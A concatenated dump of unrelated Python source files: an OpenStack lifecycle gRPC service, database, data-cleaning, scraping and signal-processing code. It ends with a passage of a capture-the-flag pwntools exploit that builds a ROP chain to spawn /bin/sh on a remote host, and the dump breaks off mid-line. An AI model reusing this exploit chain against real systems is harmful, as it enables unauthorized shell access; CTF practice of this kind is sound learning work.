zipfile\n\nfrom heatclient.common import template_utils\nfrom heatclient.exc import HTTPNotFound\nfrom pony.orm import db_session, commit\n\nimport 
utils\nfrom core import openstack_utils\nfrom core.csar.pkg import get_hot_yaml_path, CsarPkg\nfrom core.log import logger\nfrom core.models import AppInsMapper, InstantiateRequest, UploadCfgRequest, UploadPackageRequest, BaseRequest\nfrom internal.lcmservice import lcmservice_pb2_grpc\nfrom internal.lcmservice.lcmservice_pb2 import TerminateResponse, \\\n    QueryResponse, UploadCfgResponse, \\\n    RemoveCfgResponse, DeletePackageResponse, UploadPackageResponse, \\\n    WorkloadEventsResponse\n\nLOG = logger\n\n\ndef start_check_stack_status(app_instance_id):\n    """\n    start_check_stack_status\n    Args:\n        app_instance_id:\n    """\n    thread_timer = threading.Timer(5, check_stack_status, [app_instance_id])\n    thread_timer.start()\n\n\n@db_session\ndef check_stack_status(app_instance_id):\n    """\n    check_stack_status\n    Args:\n        app_instance_id:\n    """\n    app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n    if not app_ins_mapper:\n        LOG.debug('app ins: %s db record not found', app_instance_id)\n        return\n    heat = openstack_utils.create_heat_client(app_ins_mapper.host_ip)\n    stack_resp = heat.stacks.get(app_ins_mapper.stack_id)\n    if stack_resp is None and app_ins_mapper.operational_status == 'Terminating':\n        app_ins_mapper.delete()\n        LOG.debug('finish terminate app ins %s', app_instance_id)\n        return\n    if stack_resp.status == 'COMPLETE' or stack_resp.status == 'FAILED':\n        LOG.debug('app ins: %s, stack_status: %s, reason: %s',\n                  app_instance_id,\n                  stack_resp.stack_status,\n                  stack_resp.stack_status_reason)\n        if stack_resp.action == 'CREATE' and stack_resp.stack_status == 'CREATE_COMPLETE':\n            app_ins_mapper.operational_status = utils.INSTANTIATED\n            app_ins_mapper.operation_info = stack_resp.stack_status_reason\n            LOG.debug('finish instantiate app ins %s', app_instance_id)\n        elif stack_resp.action == 'DELETE' and stack_resp.stack_status == 'DELETE_COMPLETE':\n            app_ins_mapper.delete()\n            LOG.debug('finish terminate app ins %s', app_instance_id)\n        else:\n            app_ins_mapper.operation_info = stack_resp.stack_status_reason\n            app_ins_mapper.operational_status = utils.FAILURE\n            LOG.debug('failed action %s app ins %s', stack_resp.action, app_instance_id)\n    else:\n        LOG.debug('app ins %s status not updated, wait for next check...', app_instance_id)\n        start_check_stack_status(app_instance_id)\n\n\ndef validate_input_params(param):\n    """\n    validate_input_params\n    Args:\n        param:\n    Returns:\n        host_ip\n    """\n    access_token = param.access_token\n    host_ip = param.host_ip\n    LOG.debug('param hostIp: %s', host_ip)\n    LOG.debug('param accessToken: %s', access_token)\n    if not utils.validate_access_token(access_token):\n        return None\n    if not utils.validate_ipv4_address(host_ip):\n        return None\n    return host_ip\n\n\ndef _get_output_data(output_list, heat, stack_id):\n    """\n    Get the stack output data\n    """\n    response = {\n        'code': 200,\n        'msg': 'ok',\n        'data': []\n    }\n    for item in output_list['outputs']:\n        output = heat.stacks.output_show(stack_id, item['output_key'])\n        output_value = output['output']['output_value']\n        item = {\n            'vmId': output_value['vmId'],\n            'vncUrl': output_value['vncUrl'],\n            'networks': []\n        }\n        if 'networks' in output_value:\n            for net_name, ip_data in output_value['networks'].items():\n                if utils.validate_uuid(net_name):\n                    continue\n                network = {\n                    'name': net_name,\n                    'ip': ip_data[0]['addr']\n                }\n                item['networks'].append(network)\n        response['data'].append(item)\n    return response\n\n\nclass AppLcmService(lcmservice_pb2_grpc.AppLCMServicer):\n    """\n    AppLcmService\n    """\n    def uploadPackage(self, request_iterator, context):\n        """\n        Upload an app package\n        :param request_iterator:\n        :param context:\n        :return:\n        """\n        LOG.info('receive upload package msg...')\n        res = UploadPackageResponse(status=utils.FAILURE)\n\n        parameters = UploadPackageRequest(request_iterator)\n\n        host_ip = validate_input_params(parameters)\n        if host_ip is None:\n            parameters.delete_tmp()\n            return res\n\n        app_package_id = parameters.app_package_id\n        if app_package_id is None:\n            LOG.debug('appPackageId is required')\n            parameters.delete_tmp()\n            return res\n        app_package_path = utils.APP_PACKAGE_DIR + '/' + host_ip + '/' + parameters.app_package_id\n        if utils.exists_path(app_package_path):\n            LOG.debug('app package exists')\n            parameters.delete_tmp()\n            return res\n        utils.create_dir(app_package_path)\n        try:\n            LOG.debug('unzip package')\n            with zipfile.ZipFile(parameters.tmp_package_file_path) as zip_file:\n                namelist = zip_file.namelist()\n                for file in namelist:\n                    zip_file.extract(file, app_package_path)\n            pkg = CsarPkg(app_package_path)\n            pkg.translate()\n            res.status = utils.SUCCESS\n        except Exception as exception:\n            LOG.error(exception, exc_info=True)\n            utils.delete_dir(app_package_path)\n        finally:\n            parameters.delete_tmp()\n        return res\n\n    def deletePackage(self, request, context):\n        """\n        Delete an app package\n        :param request:\n        :param context:\n        :return:\n        """\n        LOG.info('receive delete package msg...')\n        res = DeletePackageResponse(status=utils.FAILURE)\n\n        host_ip = validate_input_params(BaseRequest(request))\n        if host_ip is None:\n            return res\n\n        app_package_id = request.appPackageId\n        if not app_package_id:\n            return res\n\n        app_package_path = utils.APP_PACKAGE_DIR + '/' + host_ip + '/' + app_package_id\n        utils.delete_dir(app_package_path)\n\n        res.status = utils.SUCCESS\n        return res\n\n    @db_session\n    def instantiate(self, request, context):\n        """\n        Instantiate an app\n        :param request:\n        :param context:\n        :return:\n        """\n        LOG.info('receive instantiate msg...')\n        res = TerminateResponse(status=utils.FAILURE)\n\n        parameter = InstantiateRequest(request)\n\n        LOG.debug('validate access token and host ip')\n        host_ip = validate_input_params(parameter)\n        if host_ip is None:\n            return res\n\n        LOG.debug('get instance ID')\n        app_instance_id = parameter.app_instance_id\n        if app_instance_id is None:\n            return res\n\n        LOG.debug('check the database for an existing record')\n        app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n        if app_ins_mapper is not None:\n            LOG.info('app ins %s exists', app_instance_id)\n            return res\n\n        LOG.debug('read the HOT file from the package')\n        hot_yaml_path = get_hot_yaml_path(parameter.app_package_path)\n        if hot_yaml_path is None:\n            return res\n\n        LOG.debug('build heat parameters')\n        tpl_files, template = template_utils.get_template_contents(template_file=hot_yaml_path)\n        fields = {\n            'stack_name': 'eg-' + ''.join(str(uuid.uuid4()).split('-'))[0:8],\n            'template': template,\n            'files': dict(list(tpl_files.items()))\n        }\n        LOG.debug('init heat client')\n        heat = openstack_utils.create_heat_client(host_ip)\n        try:\n            LOG.debug('send stack create request')\n            stack_resp = heat.stacks.create(**fields)\n        except Exception as exception:\n            LOG.error(exception, exc_info=True)\n            return res\n        AppInsMapper(app_instance_id=app_instance_id,\n                     host_ip=host_ip,\n                     stack_id=stack_resp['stack']['id'],\n                     operational_status=utils.INSTANTIATING)\n        LOG.debug('update the database')\n        commit()\n\n        LOG.debug('start the status-update timer task')\n        start_check_stack_status(app_instance_id=app_instance_id)\n\n        res.status = utils.SUCCESS\n        LOG.debug('message handling finished')\n        return res\n\n    @db_session\n    def terminate(self, request, context):\n        """\n        Terminate an instance\n        :param request:\n        :param context:\n        :return:\n        """\n        LOG.info('receive terminate msg...')\n        res = TerminateResponse(status=utils.FAILURE)\n\n        LOG.debug('validate token and host ip')\n        host_ip = validate_input_params(BaseRequest(request))\n        if host_ip is None:\n            return res\n\n        LOG.debug('get instance ID')\n        app_instance_id = request.appInstanceId\n        if app_instance_id is None:\n            return res\n\n        LOG.debug('query the database')\n        app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n        if app_ins_mapper is None:\n            res.status = utils.SUCCESS\n            return res\n\n        LOG.debug('initialize the openstack client')\n        heat = openstack_utils.create_heat_client(host_ip)\n        try:\n            LOG.debug('send stack delete request')\n            heat.stacks.delete(app_ins_mapper.stack_id)\n        except HTTPNotFound:\n            LOG.debug('stack does not exist')\n        except Exception as exception:\n            LOG.error(exception, exc_info=True)\n            return res\n\n        app_ins_mapper.operational_status = utils.TERMINATING\n        LOG.debug('update database status')\n        commit()\n\n        LOG.debug('start the status-update timer task')\n        start_check_stack_status(app_instance_id=app_instance_id)\n\n        res.status = utils.SUCCESS\n        LOG.debug('request handling finished')\n        return res\n\n    @db_session\n    def query(self, request, context):\n        """\n        Query instance information\n        :param request:\n        :param context:\n        :return:\n        """\n        LOG.info('receive query msg...')\n        res = QueryResponse(response='{\"code\": 500, \"msg\": \"server error\"}')\n\n        host_ip = validate_input_params(BaseRequest(request))\n        if host_ip is None:\n            res.response = '{\"code\":400}'\n            return res\n\n        app_instance_id = request.appInstanceId\n        if app_instance_id is None:\n            res.response = '{\"code\":400}'\n            return res\n\n        app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n        if app_ins_mapper is None:\n            res.response = '{\"code\":404}'\n            return res\n\n        heat = openstack_utils.create_heat_client(host_ip)\n        output_list = heat.stacks.output_list(app_ins_mapper.stack_id)\n\n        response = _get_output_data(output_list, heat, app_ins_mapper.stack_id)\n\n        res.response = json.dumps(response)\n        return res\n\n    @db_session\n    def workloadEvents(self, request, context):\n        """\n        Query workload events\n        :param request:\n        :param context:\n        :return:\n        """\n        LOG.info('receive workload describe msg...')\n        res = WorkloadEventsResponse(response='{\"code\":500}')\n\n        host_ip = validate_input_params(BaseRequest(request))\n        if host_ip is None:\n            return res\n\n        app_instance_id = request.appInstanceId\n        if app_instance_id is None:\n            return res\n\n        app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n        if app_ins_mapper is None:\n            LOG.debug('app instance %s does not exist', app_instance_id)\n            res.response = '{\"code\":404}'\n            return res\n\n        heat = openstack_utils.create_heat_client(host_ip)\n\n        events = heat.events.list(stack_id=app_ins_mapper.stack_id)\n        vm_describe_info = {}\n        for event in events:\n            if event.resource_name in vm_describe_info:\n                vm_describe_info[event.resource_name]['events'].append({\n                    'eventTime': event.event_time,\n                    'resourceStatus': event.resource_status,\n                    'resourceStatusReason': event.resource_status_reason\n                })\n            else:\n                vm_describe_info[event.resource_name] = {\n                    'resourceName': event.resource_name,\n                    'logicalResourceId': event.logical_resource_id,\n                    'physicalResourceId': event.physical_resource_id,\n                    'events': [\n                        {\n                            'eventTime': event.event_time,\n                            'resourceStatus': event.resource_status,\n                            'resourceStatusReason': event.resource_status_reason\n                        }\n                    ]\n                }\n        response_data = []\n        for key, value in vm_describe_info.items():\n            response_data.append(value)\n        res.response = json.dumps(response_data)\n        return res\n\n    def uploadConfig(self, request_iterator, context):\n        """\n        Upload an openstack configuration file\n        :param request_iterator: streamed request\n        :param context:\n        :return:\n        """\n        LOG.info('receive uploadConfig msg...')\n        res = UploadCfgResponse(status=utils.FAILURE)\n\n        parameter = UploadCfgRequest(request_iterator)\n\n        host_ip = validate_input_params(parameter)\n        if host_ip is None:\n            return res\n\n        config_file = parameter.config_file\n        if config_file is None:\n            return res\n\n        config_path = utils.RC_FILE_DIR + '/' + host_ip\n\n        try:\n            with open(config_path, 'wb') as new_file:\n                new_file.write(config_file)\n            openstack_utils.set_rc(host_ip)\n            openstack_utils.clear_glance_client(host_ip)\n            res.status = utils.SUCCESS\n        except Exception as exception:\n            LOG.error(exception, exc_info=True)\n\n        return res\n\n    def removeConfig(self, request, context):\n        """\n        Delete an openstack configuration file\n        :param request: request body\n        :param context: context information\n        :return: Success/Failure\n        """\n        LOG.info('receive removeConfig msg...')\n        res = RemoveCfgResponse(status=utils.FAILURE)\n\n        host_ip = validate_input_params(BaseRequest(request))\n        if not host_ip:\n            return res\n\n        config_path = utils.RC_FILE_DIR + '/' + host_ip\n        try:\n            os.remove(config_path)\n            openstack_utils.del_rc(host_ip)\n            openstack_utils.clear_glance_client(host_ip)\n            res.status = utils.SUCCESS\n        except OSError:\n            res.status = utils.SUCCESS\n        except Exception as exception:\n            LOG.error(exception, exc_info=True)\n            return res\n\n        LOG.debug('host configuration file deleted successfully')\n        return res\n","sub_path":"osplugin/service/app_lcm_service.py","file_name":"app_lcm_service.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169288669","text":"#!/usr/bin/python3\n"""\nAdds the State object Louisiana to the database hbtn_0e_6_usa\nArguments:\n    mysql_usr - username to connect the mySQL\n    mysql_pswd - password to connect the mySQL\n    db_name - Name of the database\n    https://docs.sqlalchemy.org/en/13/orm/tutorial.html\n"""\n\n\nfrom sys import argv\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n    mysql_usr = argv[1]\n    mysql_pswd = argv[2]\n    db_name = argv[3]\n    engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n                           .format(mysql_usr, mysql_pswd, db_name),\n                           pool_pre_ping=True)\n    Base.metadata.create_all(engine)\n    Session = sessionmaker(bind=engine)\n    session = Session()\n    new_state = State(name='Louisiana')\n    session.add(new_state)\n    session.commit()\n    print(session.query(State).filter_by(name=\"Louisiana\").first().id)\n","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"199138662","text":"# import libraries\nimport pandas as pd\nfrom flask import current_app\n\ndef clean_report(df):\n    # creating timestamp field\n    df['timestp_UTC'] = df['image'].str.split('_')\n    df['timestp_UTC'] = df['timestp_UTC'].apply(lambda x: x[0])\n    df['timestp_UTC'] = pd.to_datetime(df['timestp_UTC'], unit='ms')\n    # creating new field with camera's location\n    df['location'] = df['image'].str.split('_')\n    df['location'] = df['location'].apply(lambda x: x[1])\n    df = df.replace({\n        'A26': 'Broomielaw_@_Washington_St',\n        'A27': 'Clyde_walkway_@_McAlpine',\n        'A28': 'Broomielaw_@_James_Watt_St_(cam1)',\n        'A29': 'Broomielaw_@_James_Watt_St_(cam2)',\n        'A30': 'Broomielaw_Rear_of_Casino',\n        'A31': 'Clyde_Walkway_@_Dixon_St',\n        'A32': 
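check_stack_status/start_check_stack_status above implement a self-rearming timer poll: each check re-schedules itself every 5 seconds until the stack reaches a terminal state. A stripped-down, runnable sketch of the same pattern; fetch_status and the state names are hypothetical stand-ins for the heat client calls:

import threading

TERMINAL_STATES = {'COMPLETE', 'FAILED'}

def poll_until_done(job_id, fetch_status, interval=5):
    # one check; if the job is still running, re-arm the timer and return
    status = fetch_status(job_id)
    if status in TERMINAL_STATES:
        print(f'job {job_id} finished with status {status}')
        return
    threading.Timer(interval, poll_until_done, [job_id, fetch_status, interval]).start()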
'Clyde_Walkway_@_Jamaica_St',\n 'A33': 'Clyde_Walkway_@_Stockwell_St',\n 'A03': 'Argyle_St_@_Oswald_St(static)',\n 'A47': 'Argyle_St_@_Oswald_St',\n 'A66': 'Sauchiehall_St_@_Pitt_St',\n 'A82': 'Argyle_St_@_Brown_St',\n 'A13':\t'Byres_Rd_@_Dowanside_St',\n 'A36':\t'Gallowgate_@_High_St(cam1)',\n 'A47Static': 'Argyle_St_@_Oswald_St(static)',\n 'A47static':\t'Argyle_St_@_Oswald_St(static)',\n 'A52':\t'Gordon_St_@_Renfield_St',\n 'A71':\t'Killermont_St_@_Royal_Concert_Hall',\n 'A92':\t'Hope_St_@_Waterloo_St',\n 'C104':\t'Glasgow_Green_Doulton_Fountain',\n 'C117':\t'Maryhill_Forth_Clyde_Canal',\n 'C129':\t'Glasgow_Green_Path',\n 'C130':\t'Glasgow_Green_Circles',\n 'C132':\t'Glasgow_Green_monument',\n 'C133':\t'Glasgow_Green_suspension_walkway',\n 'C37':\t'Maryhill_Rd_@_Shakespeare_St',\n 'C79':\t'Kelvingrove_Park_fountain',\n 'C80':\t'Kelvingrove_Park_entrance',\n 'C81':\t'Kelvingrove_Park_Kelvin_Way',\n 'C82':\t'Kelvingrove Park_overview',\n 'C86':\t'Tollcross_Park(cam1)',\n 'C90':\t'Tollcross_Park(cam2)',\n 'C91':\t'Bellahouston_Park',\n 'E69':\t'Duke_St_@_Bellgrove',\n 'G124':\t'Victoria_Rd_@_Allison_St',\n 'T628':\t'Gallowgate_@_High_St(cam2)',\n 'T63':\t'George_Sq_@_South_Hanover_St',\n 'T71':\t'Argyle_St_@_Jamaica_St'\n })\n\n # dropping useless fields\n df.drop(['timestamp', 'image'], axis=1, inplace=True)\n\n # swap fields' position\n df = df[['timestp_UTC','location','car','person', \\\n 'bicycle','motorcycle','bus','truck']]\n\n return df\n\n\ndef get_df():\n df = pd.read_csv(current_app.config['CSVFILE'])\n df = clean_report(df)\n\n return df\n\ndef get_cameras_operation(df):\n df['date'] = df['timestp_UTC'].dt.strftime('%Y-%m-%d')\n df = df[['location', 'date']]\n df = df.groupby('location')['date'].agg(['first', 'last']).reset_index()\n\n return df\n","sub_path":"avenues/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"408453167","text":"import sys\ndef set_size_tester():\n test_set = set()\n for item in range(1000):\n print(f\"{item} items in set. size = {sys.getsizeof(test_set)}\")\n test_set.add(f\"item {item}\")\n\ndef list_size_tester():\n test_list = []\n for item in range(1000):\n print(f\"{item} items in list. 
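The timestamp/location parsing in clean_report() above splits the image filename on '_', treating the first token as a millisecond epoch and the second as the camera code. A minimal, runnable illustration; the filenames are made up to match that layout:

import pandas as pd

df = pd.DataFrame({'image': ['1614592800000_A26_0.jpg', '1614596400000_C79_0.jpg']})
df['timestp_UTC'] = pd.to_datetime(df['image'].str.split('_').str[0].astype('int64'), unit='ms')
df['location'] = df['image'].str.split('_').str[1]
print(df[['timestp_UTC', 'location']])  # two rows with UTC timestamps and camera codes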
size = {sys.getsizeof(test_list)}\")\n        test_list.append(f\"item {item}\")\n\nset_size_tester()\n","sub_path":"set_size.py","file_name":"set_size.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"408654684","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from bs4 import BeautifulSoup\nfrom scrapy.selector import Selector\nfrom maoyanspiders.items import MaoyanspidersItem\n\n\nclass MoviesSpider(scrapy.Spider):\n    name = 'movies'\n    allowed_domains = ['maoyan.com']\n    start_urls = ['https://maoyan.com/films?showType=3&offset=0']\n\n    # def parse(self, response):\n    #     pass\n\n    # Called automatically when the spider starts, and only once, to build the initial request objects.\n    # start_requests() reads the urls in the start_urls list, builds request objects and sends them to the engine.\n    def start_requests(self):\n        for i in range(0,10):\n            url = f'https://maoyan.com/films?showType=3&offset={i*30}'\n            yield scrapy.Request(url=url, callback=self.parse)\n    # parse callback\n    def parse(self, response):\n        items = []\n        # print the url of the page\n        print(response.url)\n\n        movies = Selector(response=response).xpath('//div[@class=\"movie-hover-info\"]')\n        moviecount = len(movies)\n        moviebriefs = Selector(response=response).xpath('//div[@class=\"movie-hover-title movie-hover-brief\"]')\n\n        for i in range(moviecount):\n\n            item = MaoyanspidersItem()\n            # XPath steps /, . and .. have different meanings\n            movieName = moviebriefs[i].xpath('./a/@title')\n            movieType = moviebriefs[i].xpath('./a/text()')\n            movieTime = movies[i].xpath('./div[@class=\"movie-hover-title\"]/text()')\n            \n\n            item['movieName'] = movieName\n            item['movieType'] = movieType\n            item['movieTime'] = movieTime\n            items.append(item)\n        return items","sub_path":"week01/maoyanspiders/maoyanspiders/spiders/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93100153","text":"import os\nimport numpy as np\n\nfrom sigpyproc import FoldedData\nfrom sigpyproc import FourierSeries\nfrom sigpyproc.Header import Header\nfrom sigpyproc import libSigPyProc as lib\n\n\nclass TimeSeries(np.ndarray):\n    \"\"\"Class for handling pulsar/FRB data in time series.\n\n    Parameters\n    ----------\n    input_array : :py:obj:`numpy.ndarray`\n        1 dimensional array of shape (nsamples)\n    header : :class:`~sigpyproc.Header.Header`\n        observational metadata\n\n    Returns\n    -------\n    :py:obj:`numpy.ndarray`\n        1 dimensional time series with header\n    \"\"\"\n\n    def __new__(cls, input_array, header):\n        obj = np.asarray(input_array).astype(np.float32, copy=False).view(cls)\n        obj.header = header\n        return obj\n\n    def __array_finalize__(self, obj):\n        if obj is None:\n            return\n        self.header = getattr(obj, 'header', None)\n\n    def fold(self, period, accel=0, nbins=50, nints=32):\n        \"\"\"Fold time series into discrete phase and subintegration bins.\n\n        Parameters\n        ----------\n        period : float\n            period in seconds to fold with\n        accel : float, optional\n            The acceleration to fold the time series, by default 0\n        nbins : int, optional\n            number of phase bins in output, by default 50\n        nints : int, optional\n            number of subintegrations in output, by default 32\n\n        Returns\n        -------\n        :class:`~sigpyproc.FoldedData.FoldedData`\n            data cube containing the folded data\n\n        Raises\n        ------\n        ValueError\n            If ``nbins * nints`` is too large for length of the data.\n        \"\"\"\n        if self.size // (nbins * nints) < 10:\n            raise ValueError(\"nbins x nints is too large for length of data\")\n        fold_ar = np.zeros(nbins * nints, dtype=\"float64\")\n        count_ar = np.zeros(nbins * nints, 
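The two testers above print the size on every iteration; a compact variant records only the iteration counts at which CPython actually grows the backing allocation (the exact byte values depend on the interpreter build):

import sys

def growth_points(n=1000):
    items, points, last = [], [], None
    for i in range(n):
        size = sys.getsizeof(items)
        if size != last:           # allocation grew (or first sample)
            points.append((i, size))
            last = size
        items.append(i)
    return points

print(growth_points(50))  # e.g. [(0, 56), (1, 88), (5, 120), ...] on CPython 3.8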
dtype=\"int32\")\n lib.foldTim(\n self,\n fold_ar,\n count_ar,\n self.header.tsamp,\n period,\n accel,\n self.size,\n nbins,\n nints,\n )\n fold_ar /= count_ar\n fold_ar = fold_ar.reshape(nints, 1, nbins)\n return FoldedData.FoldedData(\n fold_ar, self.header.newHeader(), period, self.header.refdm, accel\n )\n\n def rFFT(self):\n \"\"\"Perform 1-D real to complex forward FFT using FFTW3.\n\n Returns\n -------\n :class:`~sigpyproc.FourierSeries.FourierSeries`\n output of One-Dimensional DFTs of Real Data\n \"\"\"\n if self.size % 2 == 0:\n fftsize = self.size\n else:\n fftsize = self.size - 1\n fft_ar = lib.rfft(self, fftsize)\n return FourierSeries.FourierSeries(fft_ar, self.header.newHeader())\n\n def runningMean(self, window=10001):\n \"\"\"Filter time series with a running mean.\n\n Parameters\n ----------\n window : int, optional\n width in bins of running mean filter, by default 10001\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Raises\n ------\n RuntimeError\n If window size < 1\n\n Notes\n -----\n Window edges will be dealt by reflecting about the edges of the time series.\n For more robust implemetation, use :py:obj:`scipy.ndimage.uniform_filter1d`.\n \"\"\"\n if window < 1:\n raise RuntimeError('incorrect window size')\n tim_ar = lib.runningMean(self, window, self.size)\n return tim_ar.view(TimeSeries)\n\n def runningMedian(self, window=10001):\n \"\"\"Filter time series with a running median.\n\n Parameters\n ----------\n window : int, optional\n width in bins of running median filter, by default 10001\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Notes\n -----\n Window edges will be dealt with only at the start of the time series.\n \"\"\"\n tim_ar = lib.runningMedian(self, window, self.size)\n return tim_ar.view(TimeSeries)\n\n def applyBoxcar(self, width):\n \"\"\"Apply a boxcar filter to the time series.\n\n Parameters\n ----------\n width : int\n width in bins of filter\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Notes\n -----\n Time series returned is of size nsamples-width with width/2\n removed from either end.\n \"\"\"\n tim_ar = lib.runBoxcar(self, width, self.size)\n return tim_ar.view(TimeSeries)\n\n def downsample(self, factor):\n \"\"\"Downsample the time series.\n\n Parameters\n ----------\n factor : int\n factor by which time series will be downsampled\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n downsampled time series\n\n Notes\n -----\n Returned time series is of size nsamples//factor\n \"\"\"\n if factor == 1:\n return self\n newLen = self.size // factor\n tim_ar = lib.downsampleTim(self, factor, newLen)\n return TimeSeries(\n tim_ar, self.header.newHeader({'tsamp': self.header.tsamp * factor})\n )\n\n def pad(self, npad):\n \"\"\"Pad a time series with mean valued data.\n\n Parameters\n ----------\n npad : int\n number of padding points\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n padded time series\n \"\"\"\n new_ar = np.hstack((self, self.mean() * np.ones(npad)))\n return TimeSeries(new_ar, self.header.newHeader())\n\n def resample(self, accel, jerk=0):\n \"\"\"Perform time domain resampling to remove acceleration and jerk.\n\n Parameters\n ----------\n accel : float\n The acceleration to remove from the time series\n jerk : float, optional\n The jerk/jolt to remove from the time series, by default 0\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n 
resampled time series\n \"\"\"\n if accel > 0:\n new_size = self.size - 1\n else:\n new_size = self.size\n out_ar = np.zeros(new_size, dtype=\"float32\")\n lib.resample(self, out_ar, new_size, accel, self.header.tsamp)\n\n new_header = self.header.newHeader({\"nsamples\": out_ar.size, \"accel\": accel})\n return TimeSeries(out_ar, new_header)\n\n def correlate(self, other):\n \"\"\"Cross correlate with another time series of the same length.\n\n Parameters\n ----------\n other : array to correlate with\n :class:`numpy.ndarray`\n\n Returns\n -------\n :class:`sigpyproc.TimeSeries.TimeSeries`\n time series containing the correlation\n \"\"\"\n if not isinstance(other, TimeSeries):\n try:\n other = TimeSeries(other, self.header.newHeader())\n except Exception:\n raise Exception(\"Could not convert argument to TimeSeries instance\")\n return (self.rFFT() * other.rFFT()).iFFT()\n\n def toDat(self, basename):\n \"\"\"Write time series in presto ``.dat`` format.\n\n Parameters\n ----------\n basename : str\n file basename for output ``.dat`` and ``.inf`` files\n\n Returns\n -------\n tuple of str\n ``.dat`` file name and ``.inf`` file name\n\n Notes\n -----\n Method also writes a corresponding .inf file from the header data\n \"\"\"\n self.header.makeInf(outfile=f\"{basename}.inf\")\n with open(f\"{basename}.dat\", \"w+\") as datfile:\n if self.size % 2 == 0:\n self.tofile(datfile)\n else:\n self[:-1].tofile(datfile)\n return f\"{basename}.dat\", f\"{basename}.inf\"\n\n def toFile(self, filename=None):\n \"\"\"Write time series in sigproc format.\n\n Parameters\n ----------\n filename : str, optional\n name of file to write to, by default ``basename.tim``\n\n Returns\n -------\n str\n output file name\n \"\"\"\n if filename is None:\n filename = f\"{self.header.basename}.tim\"\n with self.header.prepOutfile(filename, nbits=32) as outfile:\n outfile.cwrite(self)\n return filename\n\n @classmethod\n def readDat(cls, filename, inf=None):\n \"\"\"Read a presto format ``.dat`` file.\n\n Parameters\n ----------\n filename : str\n the name of the ``.dat`` file to read\n inf : str, optional\n the name of the corresponding ``.inf`` file, by default None\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n a new TimeSeries object\n\n Raises\n ------\n IOError\n If no ``.inf`` file found in the same directory of ``.dat`` file.\n\n Notes\n -----\n If inf=None, then the associated .inf file must be in the same directory.\n \"\"\"\n datfile = os.path.realpath(filename)\n basename, ext = os.path.splitext(datfile)\n if inf is None:\n inf = f\"{basename}.inf\"\n if not os.path.isfile(inf):\n raise IOError(\"No corresponding .inf file found\")\n header = Header.parseInfHeader(inf)\n data = np.fromfile(filename, dtype=np.float32)\n header[\"basename\"] = basename\n header[\"inf\"] = inf\n header[\"filename\"] = filename\n header[\"nsamples\"] = data.size\n return cls(data, header)\n\n @classmethod\n def readTim(cls, filename):\n \"\"\"Read a sigproc format ``.tim`` file.\n\n Parameters\n ----------\n filename : str\n the name of the ``.tim`` file to read\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n a new TimeSeries object\n \"\"\"\n header = Header.parseSigprocHeader(filename)\n hdrlen = header[\"hdrlen\"]\n data = np.fromfile(filename, dtype=header[\"dtype\"], offset=hdrlen)\n data = data.astype(np.float32, copy=False)\n return cls(data, 
header)\n","sub_path":"sigpyproc/TimeSeries.py","file_name":"TimeSeries.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276583134","text":"from pwn import *\nimport time\n\n\naddr_gets = 0x4004ee\naddr_syscall = 0x40255e\n\naddr_pop_rdi = 0x000000000040141c\naddr_pop_rsi_r15 = 0x000000000040141a\naddr_pop_rdx = 0x00000000004023f5\naddr_pop_rax = 0x0000000000400121\n\naddr_bss = 0x604240\naddr_buf = addr_bss + 0x200\n\n\npayload = b''\n# payload += b'A' * 0x108\npayload += b'A' * 0x108\n\npayload += p64(addr_pop_rdi)\npayload += p64(addr_buf)\npayload += p64(addr_gets)\n\npayload += p64(addr_pop_rdi)\npayload += p64(addr_buf)\npayload += p64(addr_pop_rsi_r15)\npayload += p64(addr_buf + 0x18)\npayload += p64(0xdeadbeefcafebabe)\npayload += p64(addr_pop_rdx)\npayload += p64(addr_buf + 0x18)\npayload += p64(addr_pop_rax)\npayload += p64(59)\n\npayload += p64(addr_syscall)\n\n\nbuf = b''\nbuf += b'/bin/sh\\x00'\nbuf += p64(0) # @ addr_buf + 0x8\nbuf += p64(0) # @ addr_buf + 0x10\nbuf += p64(0) # @ addr_buf + 0x18\n\n\nbinpath = './chall'\nelf = ELF(binpath)\ncontext.binary = elf\ncontext.terminal = ['tmux', 'split-w', '-h']\ncontext.log_level = 'DEBUG'\n\ngdbscript = '''\ngef\n# before return\nb *0x000000000040019c\n# return from gets\nb *0x000000000400590\n# syscall\nb *0x40255e\nignore 2 1\nr\n'''\n# io = gdb.debug([binpath], aslr=False, gdbscript=gdbscript)\n# io = process(binpath)\nio = remote('13.231.207.73', 9010)\n# io = remote('localhost', 4088)\n\nio.recvuntil(b\"What's your team 